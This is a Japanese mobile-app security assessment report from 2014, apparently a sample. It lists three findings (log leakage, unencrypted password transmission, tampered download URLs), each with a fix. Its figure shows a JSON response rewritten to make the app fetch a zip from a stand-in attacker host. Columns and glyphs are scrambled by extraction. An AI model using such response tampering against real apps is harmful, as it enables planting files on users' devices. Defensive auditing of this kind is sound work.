iOSアプリケーションセキュリティ診断結果報告

iOSアプリケーションセキュリティ診断結果報告
Confidential
2014/11/19
ソニーデジタルネットワークアプリケーションズ株式会社
文書番号 SDNA-SAC-20141111-X1
iOSアプリケーションセキュリティ診断結果報告
診断対象アプリケーション ◯◯株式会社様
××アプリケーション
診断期間
2014年11月1日〜14日 10:00 - 18:00
2014年11月17日
10:00 - 18:00
診断実施場所
ソニーデジタルネットワークアプリケーションズ株式会社オフィス (IPアドレス: xxx.xxx.xxx.xxx)
診断項目
検査項目名
カテゴリ
重要情報の不適切な保存
情報漏洩
画面を通じた情報漏洩
ログを通じた情報漏洩
機能の不正利用
承認
アクセス権の妥当性
認証の妥当性
ロジックを狙った攻 Buffer overflow検出機構の有効化
撃
クライアント側でのインジェクション
不適切な証明書検証
通信
通信の暗号化
その他
プライバシーの保護状況
検出項目一覧
危険度
Low
High
Low
検査項目名
個数
ログを通じた情報漏洩
通信の暗号化
その他
合計
Copyright © 2014 Sony Digital Network Applications, Inc. All Rights Reserved.
1
1
1
3
1 ページ
iOSアプリケーションセキュリティ診断結果報告
Confidential
2014/11/19
ソニーデジタルネットワークアプリケーションズ株式会社
検出項目一覧
項番
検査項目名
指摘事項
危険度
説明
アプリの内部情報がログを通じて漏洩し、攻撃の手がかりとして利用される危険
があります
対策
アプリ実行中に、アプリで実装されているクラス名を含むアプリの内部情報が標
準ログに出力されています。
アプリが実装しているクラス名が、iOSフレームワークのもつクラス名と実行時に
衝突してしまい、以下のようなログが出力されています。
1 ログを通じた情報漏洩
アプリの内部情報がログに
Low
出力される
2 通信の暗号化
重要情報を非暗号化通信
High
で送信している
Nov 13 11:14:22 <端末名> ExampleApp[3176] <Error>: objc[3176]: Class
URLConnectionDelegate is implemented in both
/usr/lib/libTelephonyUtilDynamic.dylib and
/var/mobile/Applications/212CB72C-D05F-424B-BAB8F748761D0051/ExampleApp.app/ExampleApp. One of the two will be used.
Which one is undefined.
Nov 13 11:14:22 <端末名> ExampleApp[3176] <Error>: objc[3176]: Class
HSRequest is implemented in both
/System/Library/PrivateFrameworks/HomeSharing.framework/HomeSharing
and /var/mobile/Applications/212CB72C-D05F-424B-BAB8F748761D0051/ExampleApp.app/ExampleApp. One of the two will be used.
Which one is undefined.
アプリで実装するクラス名のプレフィックスを変更・追加し、
フレームワークとの名前衝突を回避してください。
Appleは3文字のプレフィックスを推奨しています。
パスワード等の重要な情報が非暗号化通信によって流出するおそれがありま
す
ログインやパスワード変更など、重要情報の送信を伴う通
信はHTTPSにより暗号化してください。
本アプリでは端末外部との通信が全てHTTPで行われており、パスワード等の
重要情報が平文で送信されています。
また、開発段階であっても、可能な限り本番環境と同様の
HTTPS通信を行うよう、検討されることをおすすめします。
攻撃者により、意図しないURLへのアクセスを強制され、任意のファイルが端末
にダウンロードされるおそれがあります
3 その他
意図しないURLへのアクセ
Low
スを強制される
本アプリでは複数箇所において、JSON形式の通信レスポンスに記載された
ファイル取得のためのアクセスを行う前に、外部からの入
URLへのアクセスを行い、画像ファイルや写真フレームテンプレートなどを取得力値に由来するURLのチェックを行ってください。
しています。その際、攻撃者に通信経路に割り込まれ、JSON記載のURL値を改ドメイン名のホワイトリストによるチェックを推奨します。
竄されることにより、任意のURLへのアクセスを強制させられる可能性がありま
す。その結果、攻撃者は任意のファイルを端末にダウンロードさせたり、任意の
画像をアプリ画面に表示させることが可能です。(補足情報: 図-1を参照)
Copyright © 2014 Sony Digital Network Applications, Inc. All Rights Reserved.
2 ページ
iOSアプリケーションセキュリティ診断結果報告
Confidential
2014/11/19
ソニーデジタルネットワークアプリケーションズ株式会社
補足情報
図-1 レスポンスの改竄により任意ファイルがダウンロードされる
[画面機能一覧 No.6: 写真フレームダウンロード画面]
タップ
攻撃者が用意したzipファイルがダ
ウンロードされ、アプリの
Documents ディレクトリ以下に展開
された。 ※ 端末内のファイルを抽出しFinder
で表示。
レスポンスのJSONを改竄し、
あらかじめ用意したzipファイ
ルのURLに書き換える
HTTP/1.1 200 OK Date: Tue, 10 Nov 2014 02:29:33 GMT Content-‐Type: applicaCon/json; charset=uJ-‐8 Content-‐Length: 30864 ConnecCon: close {"result":[{"templateid":72,"file":"hVp://example.com/photo_frame/files/
3871f1309b85adcb9967f01a34d66c05812c22612df9f4c6e274800963b6e16d.z
ip"} ...(中略)... ],"status":"OK"}
Copyright © 2014 Sony Digital Network Applications, Inc. All Rights Reserved.
改竄
HTTP/1.1 200 OK Date: Tue, 10 Nov 2014 02:29:33 GMT Content-‐Type: applicaCon/json; charset=uJ-‐8 Content-‐Length: 30784 ConnecCon: close {"result":[{"templateid":72,"file":"hVp://aVacker.evil.jp/evil.zip"} ...(中略)... ],"status":"OK"}
3 ページ

Download Report